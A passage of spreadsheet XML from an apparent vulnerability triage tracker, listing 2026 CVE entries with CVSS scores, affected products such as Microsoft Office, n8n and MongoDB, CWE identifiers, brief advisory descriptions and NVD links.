t="inlineStr" /><c r="M1143" s="5" t="inlineStr" /><c r="N1143" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1143" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1143" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1143" s="5" t="inlineStr" /><c r="R1143" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1143" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1143" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80082</t></is></c></row><row r="1144"><c r="A1144" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1144" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1144" s="5" t="inlineStr"><is><t>CVE-2026-80084</t></is></c><c r="D1144" s="5" t="n"><v>6.5</v></c><c r="E1144" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1144" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1144" s="5" t="inlineStr" /><c r="H1144" s="5" t="n"><v>0.007</v></c><c r="I1144" s="5" t="inlineStr" /><c r="J1144" s="5" t="inlineStr" /><c r="K1144" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1144" s="5" t="inlineStr" /><c r="M1144" s="5" t="inlineStr" /><c r="N1144" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1144" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1144" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1144" s="5" t="inlineStr" /><c r="R1144" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1144" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Outlook allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1144" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80084</t></is></c></row><row r="1145"><c r="A1145" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1145" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1145" s="5" t="inlineStr"><is><t>CVE-2026-80086</t></is></c><c r="D1145" s="5" t="n"><v>6.5</v></c><c r="E1145" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1145" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1145" s="5" t="inlineStr" /><c r="H1145" s="5" t="n"><v>0.007</v></c><c r="I1145" s="5" t="inlineStr" /><c r="J1145" s="5" t="inlineStr" /><c r="K1145" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1145" s="5" t="inlineStr" /><c r="M1145" s="5" t="inlineStr" /><c r="N1145" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1145" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1145" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1145" s="5" t="inlineStr" /><c r="R1145" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1145" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office PowerPoint allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1145" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80086</t></is></c></row><row r="1146"><c r="A1146" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1146" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1146" s="5" t="inlineStr"><is><t>CVE-2026-80087</t></is></c><c r="D1146" s="5" t="n"><v>6.5</v></c><c r="E1146" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1146" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1146" s="5" t="inlineStr" /><c r="H1146" s="5" t="n"><v>0.007</v></c><c r="I1146" s="5" t="inlineStr" /><c r="J1146" s="5" t="inlineStr" /><c r="K1146" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1146" s="5" t="inlineStr" /><c r="M1146" s="5" t="inlineStr" /><c r="N1146" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1146" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1146" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1146" s="5" t="inlineStr" /><c r="R1146" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S1146" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1146" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80087</t></is></c></row><row r="1147"><c r="A1147" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1147" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1147" s="5" t="inlineStr"><is><t>CVE-2026-80088</t></is></c><c r="D1147" s="5" t="n"><v>6.5</v></c><c r="E1147" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1147" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1147" s="5" t="inlineStr" /><c r="H1147" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1147" s="5" t="inlineStr" /><c r="J1147" s="5" t="inlineStr" /><c r="K1147" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1147" s="5" t="inlineStr" /><c r="M1147" s="5" t="inlineStr" /><c r="N1147" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1147" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1147" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1147" s="5" t="inlineStr" /><c r="R1147" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1147" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Word allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1147" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80088</t></is></c></row><row r="1148"><c r="A1148" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1148" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1148" s="5" t="inlineStr"><is><t>CVE-2026-80089</t></is></c><c r="D1148" s="5" t="n"><v>6.5</v></c><c r="E1148" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1148" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1148" s="5" t="inlineStr" /><c r="H1148" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1148" s="5" t="inlineStr" /><c r="J1148" s="5" t="inlineStr" /><c r="K1148" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1148" s="5" t="inlineStr" /><c r="M1148" s="5" t="inlineStr" /><c r="N1148" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1148" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1148" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1148" s="5" t="inlineStr" /><c r="R1148" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1148" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1148" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80089</t></is></c></row><row r="1149"><c r="A1149" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1149" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1149" s="5" t="inlineStr"><is><t>CVE-2026-80090</t></is></c><c r="D1149" s="5" t="n"><v>6.5</v></c><c r="E1149" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1149" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1149" s="5" t="inlineStr" /><c r="H1149" s="5" t="n"><v>0.007</v></c><c r="I1149" s="5" t="inlineStr" /><c r="J1149" s="5" t="inlineStr" /><c r="K1149" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L1149" s="5" t="inlineStr" /><c r="M1149" s="5" t="inlineStr" /><c r="N1149" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1149" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1149" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1149" s="5" t="inlineStr" /><c r="R1149" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1149" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Word allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1149" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80090</t></is></c></row><row r="1150"><c r="A1150" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1150" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1150" s="5" t="inlineStr"><is><t>CVE-2026-80091</t></is></c><c r="D1150" s="5" t="n"><v>6.5</v></c><c r="E1150" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1150" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1150" s="5" t="inlineStr" /><c r="H1150" s="5" t="n"><v>0.007</v></c><c r="I1150" s="5" t="inlineStr" /><c r="J1150" s="5" t="inlineStr" /><c r="K1150" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1150" s="5" t="inlineStr" /><c r="M1150" s="5" t="inlineStr" /><c r="N1150" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1150" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1150" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1150" s="5" t="inlineStr" /><c r="R1150" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="S1150" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Microsoft Office allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1150" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80091</t></is></c></row><row r="1151"><c r="A1151" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1151" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1151" s="5" t="inlineStr"><is><t>CVE-2026-81377</t></is></c><c r="D1151" s="5" t="n"><v>6.5</v></c><c r="E1151" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1151" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1151" s="5" t="inlineStr" /><c r="H1151" s="5" t="n"><v>0.008</v></c><c r="I1151" s="5" t="inlineStr" /><c r="J1151" s="5" t="inlineStr" /><c r="K1151" s="5" t="inlineStr"><is><t>microsoft:visual_studio_code</t></is></c><c r="L1151" s="5" t="inlineStr" /><c r="M1151" s="5" t="inlineStr" /><c r="N1151" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1151" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1151" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1151" s="5" t="inlineStr" /><c r="R1151" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="S1151" s="5" t="inlineStr"><is><t>Improper limitation of a pathname to a restricted directory ('path traversal') in Visual Studio Code allows an unauthorized attacker to perform tampering over a network.</t></is></c><c r="T1151" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81377</t></is></c></row><row r="1152"><c r="A1152" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1152" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1152" s="5" t="inlineStr"><is><t>CVE-2026-81792</t></is></c><c r="D1152" s="5" t="n"><v>6.5</v></c><c r="E1152" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1152" s="5" t="inlineStr"><is><t>audit@patchstack.com</t></is></c><c r="G1152" s="5" t="inlineStr" /><c r="H1152" s="5" t="n"><v>0.002</v></c><c r="I1152" s="5" t="inlineStr" /><c r="J1152" s="5" t="inlineStr" /><c r="K1152" s="5" t="inlineStr" /><c r="L1152" s="5" t="inlineStr" /><c r="M1152" s="5" t="inlineStr" /><c r="N1152" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1152" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1152" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1152" s="5" t="inlineStr" /><c r="R1152" s="5" t="inlineStr"><is><t>CWE-266</t></is></c><c r="S1152" s="5" t="inlineStr"><is><t>Unauthenticated Privilege Escalation in Product Catalog Enquiry for WooCommerce by MultiVendorX &lt;= 6.1.4 versions.</t></is></c><c r="T1152" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81792</t></is></c></row><row r="1153"><c r="A1153" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1153" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1153" s="5" t="inlineStr"><is><t>CVE-2026-81802</t></is></c><c r="D1153" s="5" t="n"><v>6.5</v></c><c r="E1153" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1153" s="5" t="inlineStr"><is><t>audit@patchstack.com</t></is></c><c r="G1153" s="5" t="inlineStr" /><c r="H1153" s="5" t="n"><v>0.002</v></c><c r="I1153" s="5" t="inlineStr" /><c r="J1153" s="5" t="inlineStr" /><c r="K1153" s="5" t="inlineStr" /><c r="L1153" s="5" t="inlineStr" /><c r="M1153" s="5" t="inlineStr" /><c r="N1153" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1153" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1153" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1153" s="5" t="inlineStr" /><c r="R1153" s="5" t="inlineStr"><is><t>CWE-639</t></is></c><c r="S1153" s="5" t="inlineStr"><is><t>Unauthenticated Insecure Direct Object References (IDOR) in WpEvently &lt;= 5.6.0 versions.</t></is></c><c r="T1153" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81802</t></is></c></row><row r="1154"><c r="A1154" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1154" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1154" s="5" t="inlineStr"><is><t>CVE-2026-82059</t></is></c><c r="D1154" s="5" t="n"><v>6.5</v></c><c r="E1154" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1154" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1154" s="5" t="inlineStr" /><c r="H1154" s="5" t="n"><v>0.003</v></c><c r="I1154" s="5" t="inlineStr" /><c r="J1154" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K1154" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L1154" s="5" t="inlineStr" /><c r="M1154" s="5" t="inlineStr" /><c r="N1154" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1154" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1154" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1154" s="5" t="inlineStr" /><c r="R1154" s="5" t="inlineStr"><is><t>CWE-617</t></is></c><c r="S1154" s="5" t="inlineStr"><is><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is></c><c r="T1154" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82059</t></is></c></row><row r="1155"><c r="A1155" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1155" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1155" s="5" t="inlineStr"><is><t>CVE-2026-82069</t></is></c><c r="D1155" s="5" t="n"><v>6.5</v></c><c r="E1155" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1155" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1155" s="5" t="inlineStr" /><c r="H1155" s="5" t="n"><v>0.003</v></c><c r="I1155" s="5" t="inlineStr" /><c r="J1155" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K1155" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L1155" s="5" t="inlineStr" /><c r="M1155" s="5" t="inlineStr" /><c r="N1155" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1155" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1155" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1155" s="5" t="inlineStr" /><c r="R1155" s="5" t="inlineStr"><is><t>CWE-212</t></is></c><c r="S1155" s="5" t="inlineStr"><is><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is></c><c r="T1155" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82069</t></is></c></row><row r="1156"><c r="A1156" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1156" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1156" s="5" t="inlineStr"><is><t>CVE-2026-84282</t></is></c><c r="D1156" s="5" t="n"><v>6.5</v></c><c r="E1156" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1156" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1156" s="5" t="inlineStr" /><c r="H1156" s="5" t="n"><v>0.002</v></c><c r="I1156" s="5" t="inlineStr" /><c r="J1156" s="5" t="inlineStr" /><c r="K1156" s="5" t="inlineStr" /><c r="L1156" s="5" t="inlineStr" /><c r="M1156" s="5" t="inlineStr" /><c r="N1156" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1156" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1156" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1156" s="5" t="inlineStr" /><c r="R1156" s="5" t="inlineStr" /><c r="S1156" s="5" t="inlineStr"><is><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is></c><c r="T1156" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84282</t></is></c></row><row r="1157"><c r="A1157" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1157" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1157" s="5" t="inlineStr"><is><t>CVE-2026-84391</t></is></c><c r="D1157" s="5" t="n"><v>6.5</v></c><c r="E1157" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1157" s="5" t="inlineStr"><is><t>psirt@fortinet.com</t></is></c><c r="G1157" s="5" t="inlineStr" /><c r="H1157" s="5" t="n"><v>0.002</v></c><c r="I1157" s="5" t="inlineStr" /><c r="J1157" s="5" t="inlineStr"><is><t>fortinet</t></is></c><c r="K1157" s="5" t="inlineStr" /><c r="L1157" s="5" t="inlineStr" /><c r="M1157" s="5" t="inlineStr" /><c r="N1157" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1157" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1157" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1157" s="5" t="inlineStr" /><c r="R1157" s="5" t="inlineStr"><is><t>CWE-457</t></is></c><c r="S1157" s="5" t="inlineStr"><is><t>A use of uninitialized variable vulnerability in Fortinet FortiAnalyzer 7.6.3 through 7.6.6 may allow attacker to denial of service via &lt;insert attack vector here&gt;</t></is></c><c r="T1157" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84391</t></is></c></row><row r="1158"><c r="A1158" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1158" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1158" s="5" t="inlineStr"><is><t>CVE-2026-84685</t></is></c><c r="D1158" s="5" t="n"><v>6.5</v></c><c r="E1158" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1158" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1158" s="5" t="inlineStr" /><c r="H1158" s="5" t="n"><v>0.002</v></c><c r="I1158" s="5" t="inlineStr" /><c r="J1158" s="5" t="inlineStr" /><c r="K1158" s="5" t="inlineStr" /><c r="L1158" s="5" t="inlineStr" /><c r="M1158" s="5" t="inlineStr" /><c r="N1158" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1158" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1158" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1158" s="5" t="inlineStr" /><c r="R1158" s="5" t="inlineStr"><is><t>CWE-488</t></is></c><c r="S1158" s="5" t="inlineStr"><is><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is></c><c r="T1158" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84685</t></is></c></row><row r="1159"><c r="A1159" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1159" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1159" s="5" t="inlineStr"><is><t>CVE-2026-86077</t></is></c><c r="D1159" s="5" t="n"><v>6.5</v></c><c r="E1159" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1159" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1159" s="5" t="inlineStr" /><c r="H1159" s="5" t="n"><v>0.003</v></c><c r="I1159" s="5" t="inlineStr" /><c r="J1159" s="5" t="inlineStr" /><c r="K1159" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L1159" s="5" t="inlineStr" /><c r="M1159" s="5" t="inlineStr" /><c r="N1159" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1159" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1159" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1159" s="5" t="inlineStr" /><c r="R1159" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1159" s="5" t="inlineStr"><is><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is></c><c r="T1159" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86077</t></is></c></row><row r="1160"><c r="A1160" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1160" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1160" s="5" t="inlineStr"><is><t>CVE-2026-86078</t></is></c><c r="D1160" s="5" t="n"><v>6.5</v></c><c r="E1160" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1160" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1160" s="5" t="inlineStr" /><c r="H1160" s="5" t="n"><v>0.003</v></c><c r="I1160" s="5" t="inlineStr" /><c r="J1160" s="5" t="inlineStr" /><c r="K1160" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L1160" s="5" t="inlineStr" /><c r="M1160" s="5" t="inlineStr" /><c r="N1160" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1160" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1160" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1160" s="5" t="inlineStr" /><c r="R1160" s="5" t="inlineStr"><is><t>CWE-1321</t></is></c><c r="S1160" s="5" t="inlineStr"><is><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is></c><c r="T1160" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86078</t></is></c></row><row r="1161"><c r="A1161" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1161" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1161" s="5" t="inlineStr"><is><t>CVE-2026-86079</t></is></c><c r="D1161" s="5" t="n"><v>6.5</v></c><c r="E1161" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1161" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1161" s="5" t="inlineStr" /><c r="H1161" s="5" t="n"><v>0.003</v></c><c r="I1161" s="5" t="inlineStr" /><c r="J1161" s="5" t="inlineStr" /><c r="K1161" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L1161" s="5" t="inlineStr" /><c r="M1161" s="5" t="inlineStr" /><c r="N1161" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1161" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1161" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1161" s="5" t="inlineStr" /><c r="R1161" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="S1161" s="5" t="inlineStr"><is><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is></c><c r="T1161" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86079</t></is></c></row><row r="1162"><c r="A1162" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1162" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1162" s="5" t="inlineStr"><is><t>CVE-2026-86082</t></is></c><c r="D1162" s="5" t="n"><v>6.5</v></c><c r="E1162" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1162" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1162" s="5" t="inlineStr" /><c r="H1162" s="5" t="n"><v>0.002</v></c><c r="I1162" s="5" t="inlineStr" /><c r="J1162" s="5" t="inlineStr" /><c r="K1162" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L1162" s="5" t="inlineStr" /><c r="M1162" s="5" t="inlineStr" /><c r="N1162" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1162" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1162" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1162" s="5" t="inlineStr" /><c r="R1162" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="S1162" s="5" t="inlineStr"><is><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is></c><c r="T1162" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86082</t></is></c></row><row r="1163"><c r="A1163" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1163" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1163" s="5" t="inlineStr"><is><t>CVE-2026-86550</t></is></c><c r="D1163" s="5" t="n"><v>6.5</v></c><c r="E1163" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1163" s="5" t="inlineStr"><is><t>psirt@zte.com.cn</t></is></c><c r="G1163" s="5" t="inlineStr" /><c r="H1163" s="5" t="n"><v>0.003</v></c><c r="I1163" s="5" t="inlineStr" /><c r="J1163" s="5" t="inlineStr" /><c r="K1163" s="5" t="inlineStr" /><c r="L1163" s="5" t="inlineStr" /><c r="M1163" s="5" t="inlineStr" /><c r="N1163" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1163" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1163" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1163" s="5" t="inlineStr" /><c r="R1163" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1163" s="5" t="inlineStr"><is><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is></c><c r="T1163" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86550</t></is></c></row><row r="1164"><c r="A1164" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1164" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1164" s="5" t="inlineStr"><is><t>CVE-2026-86597</t></is></c><c r="D1164" s="5" t="n"><v>6.5</v></c><c r="E1164" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1164" s="5" t="inlineStr"><is><t>412d305a-227d-44f9-a262-a31ba44f2aea</t></is></c><c r="G1164" s="5" t="inlineStr" /><c r="H1164" s="5" t="n"><v>0.001</v></c><c r="I1164" s="5" t="inlineStr" /><c r="J1164" s="5" t="inlineStr" /><c r="K1164" s="5" t="inlineStr" /><c r="L1164" s="5" t="inlineStr" /><c r="M1164" s="5" t="inlineStr" /><c r="N1164" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1164" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1164" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1164" s="5" t="inlineStr" /><c r="R1164" s="5" t="inlineStr"><is><t>CWE-532</t></is></c><c r="S1164" s="5" t="inlineStr"><is><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is></c><c r="T1164" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86597</t></is></c></row><row r="1165"><c r="A1165" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1165" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1165" s="5" t="inlineStr"><is><t>CVE-2026-86726</t></is></c><c r="D1165" s="5" t="n"><v>6.5</v></c><c r="E1165" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1165" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1165" s="5" t="inlineStr" /><c r="H1165" s="5" 